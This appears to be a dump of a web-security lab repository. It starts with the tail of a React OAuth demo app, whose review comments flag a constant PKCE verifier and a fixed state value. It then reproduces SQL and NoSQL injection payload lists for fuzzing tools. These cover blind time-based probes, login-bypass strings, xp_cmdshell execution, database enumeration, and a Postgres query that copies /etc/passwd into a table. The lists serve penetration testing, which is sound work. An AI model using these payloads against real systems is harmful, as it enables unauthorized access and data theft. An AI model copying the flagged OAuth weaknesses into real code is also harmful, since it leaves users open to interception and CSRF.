    scope: ['user-read-email'].join(' '),
    response_type: 'code',
    state: params.user.oauth.providers.spotify.key,
  }

  const url = queryString.stringifyUrl({ url: endpoint, query }, { encode: false })

  console.log(url)

  return url
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/twitter.js: --------------------------------------------------------------------------------
// Imports
import * as queryString from 'query-string'

// App imports
import { URL_WEB, OAUTH_TWITTER_ID } from 'setup/config/env'
import routes from 'setup/routes'
import params from 'setup/config/params'

// twitter
// Builds the Twitter OAuth 2.0 authorization-code URL.
// NOTE(review): PKCE is sent with a constant verifier (the literal string
// 'code_challenge' with method 'plain'), so it provides none of the
// code-interception protection PKCE exists for. A random per-request verifier
// (S256-hashed) is needed, but the token exchange that presents the verifier
// lives outside this file and must change in step, so it is left as-is here.
// `state` is likewise the fixed provider key — no per-request CSRF nonce.
export default function twitter() {
  const endpoint = `https://twitter.com/i/oauth2/authorize`
  const scope = ['offline.access', 'users.read', 'tweet.read'].join(' ')

  const query = {
    client_id: OAUTH_TWITTER_ID,
    redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`,
    response_type: 'code',
    scope,
    code_challenge: 'code_challenge',
    code_challenge_method: 'plain',
    state: params.user.oauth.providers.twitter.key,
  }

  const url = queryString.stringifyUrl({ url: endpoint, query }, { encode: false })

  console.log(url)

  return url
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/zoom.js: --------------------------------------------------------------------------------
// Imports
import * as queryString from 'query-string'

// App imports
import { URL_WEB, OAUTH_ZOOM_ID } from 'setup/config/env'
import routes from 'setup/routes'
import params from 'setup/config/params'

// zoom
// Builds the Zoom authorization-code URL (no explicit scope is requested).
// NOTE(review): `state` is the fixed provider key — no per-request CSRF nonce.
export default function zoom() {
  const endpoint = 'https://zoom.us/oauth/authorize'

  const query = {
    client_id: OAUTH_ZOOM_ID,
    redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`,
    response_type: 'code',
    state: params.user.oauth.providers.zoom.key,
  }

  const url = queryString.stringifyUrl({ url: endpoint, query }, { encode: false })

  console.log(url)

  return url
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/routes.js: --------------------------------------------------------------------------------
// App imports
import PagesHome from 'modules/pages/Home'
import PagesAuthorize from 'modules/pages/Authorize'
import UserDashboard from 'modules/user/Dashboard'
import UserProfile from 'modules/user/Profile'
import NoteList from 'modules/note/List'

// Combined routes
// Each entry pairs a path with the component rendered there. `exact` and
// `auth` are consumed by the router setup outside this file; `auth: true`
// presumably marks pages that require a signed-in user — confirm there, since
// nothing in this file enforces it. The OAuth provider URLs use
// `pagesAuthorize.path` as the callback path.
const routes = {
  // pages home
  pagesHome: {
    path: '/',
    component: PagesHome,
    exact: true,
  },

  // pages authorize
  pagesAuthorize: {
    path: '/authorize',
    component: PagesAuthorize,
  },

  // user dashboard
  userDashboard: {
    path: '/dashboard',
    component: UserDashboard,
    auth: true,
  },

  // user profile
  userProfile: {
    path: '/profile',
    component: UserProfile,
    auth: true,
  },

  // note list
  noteList: {
    path: '/notes',
    component: NoteList,
    auth: true,
  },
}

export default routes
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/store.js: --------------------------------------------------------------------------------
// Imports
import { createStore, combineReducers, applyMiddleware } from 'redux'
import thunk from 'redux-thunk'

// App imports
import user from '../modules/user/api/state'

// Root Reducer
// `user` is the map of slice reducers ({ auth }); spreading it keeps each
// slice under its own key in the store.
const rootReducer = combineReducers({
  ...user,
})

// Store
// Thunk middleware lets action creators return functions of `dispatch`
// (e.g. logout() does), so they can run side effects before dispatching.
export const store = createStore(rootReducer, applyMiddleware(thunk))
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/ui/Button/index.js:
-------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | 4 | // UI imports 5 | import './style.css' 6 | 7 | // Component 8 | const Button = ({ isLoading = false, title, image, as = 'button', ...props }) => 9 | React.createElement( 10 | as, 11 | { className: 'button', ...props }, 12 | <> 13 | {image ? {title} : ''} 14 | 15 | {title} 16 | , 17 | ) 18 | 19 | export default Button 20 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/ui/Button/style.css: -------------------------------------------------------------------------------- 1 | /* root */ 2 | .button { 3 | display: flex; 4 | flex-direction: row; 5 | align-items: center; 6 | justify-content: center; 7 | text-transform: uppercase; 8 | cursor: pointer; 9 | outline: none; 10 | padding: 0.6rem 1rem; 11 | font-size: 1rem; 12 | font-weight: 700; 13 | color: var(--black); 14 | border-radius: 0.2rem; 15 | background-color: var(--white); 16 | border: 1px solid var(--grey); 17 | } 18 | 19 | /* states */ 20 | .button:hover { 21 | border: 1px solid var(--black); 22 | } 23 | 24 | .button img { 25 | height: 1.2rem; 26 | width: 1.2rem; 27 | margin-right: 0.5rem; 28 | } 29 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/ui/Input/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | 4 | // UI imports 5 | import './style.css' 6 | 7 | // Component 8 | const Text = ({ 9 | type = 'text', 10 | placeholder, 11 | label, 12 | required = false, 13 | ...props 14 | }) => 15 | React.createElement( 16 | 'div', 17 | { className: 'input', ...props }, 18 | <> 19 | {label && ( 20 |
21 | {label} 22 | {required && ' *'} 23 |
24 | )} 25 | 26 | 32 | , 33 | ) 34 | 35 | export default Text 36 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/ui/Input/style.css: -------------------------------------------------------------------------------- 1 | /* input - text */ 2 | .input { 3 | margin-bottom: 1rem; 4 | } 5 | 6 | .input input { 7 | outline: none; 8 | padding: 0.5rem 1rem; 9 | font-size: 1rem; 10 | width: 100%; 11 | border-radius: 0.2rem; 12 | color: var(--black); 13 | background-color: var(--white); 14 | border: 1px solid var(--grey); 15 | } 16 | .input input:focus { 17 | border: 1px solid var(--primary); 18 | } 19 | 20 | /* Label */ 21 | .input .label { 22 | margin-bottom: 0.5rem; 23 | } 24 | 25 | /* width */ 26 | .input.width-full { 27 | width: 100%; 28 | } 29 | .input.width-auto { 30 | width: auto; 31 | } 32 | 33 | /* state */ 34 | /* - disabled */ 35 | .input input:disabled { 36 | color: #999999; 37 | cursor: not-allowed; 38 | } 39 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/ui/common/colors.css: -------------------------------------------------------------------------------- 1 | /* colors */ 2 | :root { 3 | --primary: #0000ff; 4 | --positive: #4caf50; 5 | --negative: #f44336; 6 | --warning: #ff9800; 7 | --white: #ffffff; 8 | --black: #000000; 9 | --grey: #aaaaaa; 10 | --grey-light: #f0f0f0; 11 | --grey-dark: #666666; 12 | } 13 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/ui/common/reset.css: -------------------------------------------------------------------------------- 1 | /* - reset */ 2 | 3 | html { 4 | box-sizing: border-box; 5 | -webkit-font-smoothing: antialiased; 6 | -moz-osx-font-smoothing: grayscale; 7 | -webkit-font-smoothing: antialiased; 8 | -moz-osx-font-smoothing: grayscale; 9 | margin: 
0; 10 | padding: 0; 11 | } 12 | *, 13 | *::before, 14 | *::after { 15 | box-sizing: inherit; 16 | } 17 | * { 18 | font-family: sans-serif; 19 | } 20 | body { 21 | margin: 0; 22 | padding: 0; 23 | background-color: var(--white); 24 | display: flex; 25 | color: var(--black); 26 | } 27 | a { 28 | color: inherit; 29 | text-decoration: none; 30 | } 31 | b, 32 | strong { 33 | font-weight: 600 !important; 34 | } 35 | h1, 36 | h2, 37 | h3, 38 | h4, 39 | h5, 40 | h6, 41 | p { 42 | margin: 0; 43 | padding: 0; 44 | } 45 | 46 | body { 47 | display: flex; 48 | flex: 1; 49 | min-height: 100vh; 50 | } 51 | #root { 52 | display: flex; 53 | flex: 1; 54 | flex-direction: column; 55 | } 56 | -------------------------------------------------------------------------------- /open-redirect/open-redirect-payload-list/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Payload Box 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /os-command-injection/command-injection-payload-list/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 İsmail Taşdelen 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /server-side-request-forgery/ssti-payloads/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Payload Box 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/detect/GenericBlind.txt: -------------------------------------------------------------------------------- 1 | sleep(__TIME__)# 2 | 1 or sleep(__TIME__)# 3 | " or sleep(__TIME__)# 4 | ' or sleep(__TIME__)# 5 | " or sleep(__TIME__)=" 6 | ' or sleep(__TIME__)=' 7 | 1) or sleep(__TIME__)# 8 | ") or sleep(__TIME__)=" 9 | ') or sleep(__TIME__)=' 10 | 1)) or sleep(__TIME__)# 11 | ")) or sleep(__TIME__)=" 12 | ')) or sleep(__TIME__)=' 13 | ;waitfor delay '0:0:__TIME__'-- 14 | );waitfor delay '0:0:__TIME__'-- 15 | ';waitfor delay '0:0:__TIME__'-- 16 | ";waitfor delay '0:0:__TIME__'-- 17 | ');waitfor delay '0:0:__TIME__'-- 18 | ");waitfor delay '0:0:__TIME__'-- 19 | ));waitfor delay '0:0:__TIME__'-- 20 | '));waitfor delay '0:0:__TIME__'-- 21 | "));waitfor delay '0:0:__TIME__'-- 22 | benchmark(10000000,MD5(1))# 23 | 1 or benchmark(10000000,MD5(1))# 24 | " or benchmark(10000000,MD5(1))# 25 | ' or benchmark(10000000,MD5(1))# 26 | 1) or benchmark(10000000,MD5(1))# 27 | ") or benchmark(10000000,MD5(1))# 28 | ') or benchmark(10000000,MD5(1))# 29 | 1)) or benchmark(10000000,MD5(1))# 30 | ")) or benchmark(10000000,MD5(1))# 31 | ')) or benchmark(10000000,MD5(1))# 32 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/detect/MSSQL/MSSQL.txt: -------------------------------------------------------------------------------- 1 | ; -- 2 | '; -- 3 | '); -- 4 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 5 | ' grant connect to name; grant resource to name; -- 6 | ' or 1=1 -- 7 | ' union (select @@version) -- 8 | ' union (select NULL, (select @@version)) -- 9 | ' union (select NULL, NULL, (select @@version)) -- 10 | ' union (select NULL, NULL, NULL, (select @@version)) -- 11 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 12 | ' union (select NULL, NULL, 
NULL, NULL, NULL, (select @@version)) -- 13 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/detect/MSSQL/MSSQL_blind.txt: -------------------------------------------------------------------------------- 1 | '; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' -- 2 | '; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' -- 3 | '; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' -- 4 | '; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' -- 5 | '; if not(select system_user) <> 'sa' waitfor delay '0:0:2' -- 6 | '; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 7 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' -- 8 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- 9 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/detect/MySQL/MySQL.txt: -------------------------------------------------------------------------------- 1 | 1'1 2 | 1 exec sp_ (or exec xp_) 3 | 1 and 1=1 4 | 1' and 1=(select count(*) from tablenames); -- 5 | 1 or 1=1 6 | 1' or '1'='1 7 | 1or1=1 8 | 1'or'1'='1 9 | fake@ema'or'il.nl'='il.nl 10 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/detect/MySQL/MySQL_MSSQL.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 1 and user_name() = 'dbo' 3 | \'; desc users; -- 4 | 1\'1 5 | 1' and non_existant_table = '1 6 | ' or username is not NULL or username = ' 7 | 1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116 8 | 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- 9 | 1 uni/**/on select all from where 10 | 11 | 
-------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/detect/NoSQL/no-sql.txt: -------------------------------------------------------------------------------- 1 | true, $where: '1 == 1' 2 | , $where: '1 == 1' 3 | $where: '1 == 1' 4 | ', $where: '1 == 1' 5 | 1, $where: '1 == 1' 6 | { $ne: 1 } 7 | ', $or: [ {}, { 'a':'a 8 | ' } ], $comment:'successful MongoDB injection' 9 | db.injection.insert({success:1}); 10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 11 | || 1==1 12 | ' && this.password.match(/.*/)//+%00 13 | ' && this.passwordzz.match(/.*/)//+%00 14 | '%20%26%26%20this.password.match(/.*/)//+%00 15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00 16 | {$gt: ''} 17 | [$ne]=1 18 | ';sleep(5000); 19 | ';sleep(5000);' 20 | ';sleep(5000);+' 21 | ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/exploit/DB2/db2-enumeration.txt: -------------------------------------------------------------------------------- 1 | select versionnumber, version_timestamp from sysibm.sysversions; 2 | select user from sysibm.sysdummy1; 3 | select session_user from sysibm.sysdummy1; 4 | select system_user from sysibm.sysdummy1; 5 | select current server from sysibm.sysdummy1; 6 | select name from sysibm.systables; 7 | select grantee from syscat.dbauth; 8 | select * from syscat.tabauth; 9 | select * from syscat.dbauth where grantee = current user; 10 | select * from syscat.tabauth where grantee = current user; 11 | select name, tbname, coltype from sysibm.syscolumns; 12 | SELECT schemaname FROM syscat.schemata; 13 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/exploit/MSSQL/ms-sql-enumeration.txt: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/sql-injection/sql-injection-payload-list/Intruder/exploit/MSSQL/ms-sql-enumeration.txt -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/exploit/MySQL/mysql-injection-login-bypass.txt: -------------------------------------------------------------------------------- 1 | ' OR 1=1-- 2 | 'OR '' = ' Allows authentication without a valid username. 3 | '-- 4 | ' union select 1, '', '' 1-- 5 | 'OR 1=1-- 6 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/exploit/MySQL/mysql-read-local-files.txt: -------------------------------------------------------------------------------- 1 | create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile; 2 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/exploit/PostgresSQL/postgres-enumeration.txt: -------------------------------------------------------------------------------- 1 | select version(); 2 | select current_database(); 3 | select current_user; 4 | select session_user; 5 | select current_setting('log_connections'); 6 | select current_setting('log_statement'); 7 | select current_setting('port'); 8 | select current_setting('password_encryption'); 9 | select current_setting('krb_server_keyfile'); 10 | select current_setting('virtual_host'); 11 | select current_setting('port'); 12 | select current_setting('config_file'); 13 | select current_setting('hba_file'); 14 | select current_setting('data_directory'); 15 | select * from pg_shadow; 16 | select * from pg_group; 17 | create table myfile (input TEXT); 18 | copy myfile from '/etc/passwd'; 19 | select 
* from myfile;copy myfile to /tmp/test; 20 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/payloads-sql-blind/MSSQL/payloads-sql-blind-MSSQL-WHERE.txt: -------------------------------------------------------------------------------- 1 | waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ) waitfor delay '0:0:20' /* 8 | ) waitfor delay '0:0:20' -- 9 | )) waitfor delay '0:0:20' /* 10 | )) waitfor delay '0:0:20' -- 11 | ))) waitfor delay '0:0:20' /* 12 | ))) waitfor delay '0:0:20' -- 13 | )))) waitfor delay '0:0:20' /* 14 | )))) waitfor delay '0:0:20' -- 15 | ))))) waitfor delay '0:0:20' -- 16 | )))))) waitfor delay '0:0:20' -- 17 | ') waitfor delay '0:0:20' /* 18 | ') waitfor delay '0:0:20' -- 19 | ") waitfor delay '0:0:20' /* 20 | ") waitfor delay '0:0:20' -- 21 | ')) waitfor delay '0:0:20' /* 22 | ')) waitfor delay '0:0:20' -- 23 | ")) waitfor delay '0:0:20' /* 24 | ")) waitfor delay '0:0:20' -- 25 | '))) waitfor delay '0:0:20' /* 26 | '))) waitfor delay '0:0:20' -- 27 | "))) waitfor delay '0:0:20' /* 28 | "))) waitfor delay '0:0:20' -- 29 | ')))) waitfor delay '0:0:20' /* 30 | ')))) waitfor delay '0:0:20' -- 31 | ")))) waitfor delay '0:0:20' /* 32 | ")))) waitfor delay '0:0:20' -- 33 | '))))) waitfor delay '0:0:20' /* 34 | '))))) waitfor delay '0:0:20' -- 35 | "))))) waitfor delay '0:0:20' /* 36 | "))))) waitfor delay '0:0:20' -- 37 | ')))))) waitfor delay '0:0:20' /* 38 | ')))))) waitfor delay '0:0:20' -- 39 | ")))))) waitfor delay '0:0:20' /* 40 | ")))))) waitfor delay '0:0:20' -- -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/payloads-sql-blind/MySQL/payloads-sql-blind-MySQL-ORDER_BY.txt: 
-------------------------------------------------------------------------------- 1 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 2 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 3 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 4 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 5 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 6 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 7 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 8 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 9 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 10 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 11 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 12 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 13 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 14 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 15 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 16 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 17 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 18 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 19 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/payloads-sql-blind/MySQL/payloads-sql-blind-MySQL-WHERE.txt: -------------------------------------------------------------------------------- 1 | and 
0=benchmark(3000000,MD5(1))%20/* 2 | and 0=benchmark(3000000,MD5(1))%20-- 3 | and 0=benchmark(3000000,MD5(1))%20%23 4 | ' and 0=benchmark(3000000,MD5(1))%20/* 5 | ' and 0=benchmark(3000000,MD5(1))%20-- 6 | ' and 0=benchmark(3000000,MD5(1))%20%23 7 | " and 0=benchmark(3000000,MD5(1))%20/* 8 | " and 0=benchmark(3000000,MD5(1))%20-- 9 | " and 0=benchmark(3000000,MD5(1))%20%23 10 | ) and 0=benchmark(3000000,MD5(1))%20/* 11 | ) and 0=benchmark(3000000,MD5(1))%20-- 12 | ) and 0=benchmark(3000000,MD5(1))%20%23 13 | )) and 0=benchmark(3000000,MD5(1))%20/* 14 | )) and 0=benchmark(3000000,MD5(1))%20-- 15 | )) and 0=benchmark(3000000,MD5(1))%20%23 16 | ))) and 0=benchmark(3000000,MD5(1))%20/* 17 | ))) and 0=benchmark(3000000,MD5(1))%20-- 18 | ))) and 0=benchmark(3000000,MD5(1))%20%23 19 | )))) and 0=benchmark(3000000,MD5(1))%20/* 20 | )))) and 0=benchmark(3000000,MD5(1))%20-- 21 | )))) and 0=benchmark(3000000,MD5(1))%20%23 22 | ') and 0=benchmark(3000000,MD5(1))%20/* 23 | ') and 0=benchmark(3000000,MD5(1))%20-- 24 | ') and 0=benchmark(3000000,MD5(1))%20%23 25 | ") and 0=benchmark(3000000,MD5(1))%20/* 26 | ") and 0=benchmark(3000000,MD5(1))%20-- 27 | ") and 0=benchmark(3000000,MD5(1))%20%23 28 | ')) and 0=benchmark(3000000,MD5(1))%20/* 29 | ')) and 0=benchmark(3000000,MD5(1))%20-- 30 | ')) and 0=benchmark(3000000,MD5(1))%20%23 31 | ")) and 0=benchmark(3000000,MD5(1))%20/* 32 | ")) and 0=benchmark(3000000,MD5(1))%20-- 33 | ")) and 0=benchmark(3000000,MD5(1))%20%23 34 | '))) and 0=benchmark(3000000,MD5(1))%20/* 35 | '))) and 0=benchmark(3000000,MD5(1))%20-- 36 | '))) and 0=benchmark(3000000,MD5(1))%20%23 37 | "))) and 0=benchmark(3000000,MD5(1))%20/* 38 | "))) and 0=benchmark(3000000,MD5(1))%20-- 39 | "))) and 0=benchmark(3000000,MD5(1))%20%23 40 | ')))) and 0=benchmark(3000000,MD5(1))%20/* 41 | ')))) and 0=benchmark(3000000,MD5(1))%20-- 42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23 43 | ")))) and 0=benchmark(3000000,MD5(1))%20/* 44 | ")))) and 
0=benchmark(3000000,MD5(1))%20-- 45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23 -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Payload Box 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /xml-external-entity-xxe-injection/xxe-injection-payload-list/Image/xxe-injection.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/xml-external-entity-xxe-injection/xxe-injection-payload-list/Image/xxe-injection.jpg -------------------------------------------------------------------------------- /xml-external-entity-xxe-injection/xxe-injection-payload-list/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Payload Box 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | --------------------------------------------------------------------------------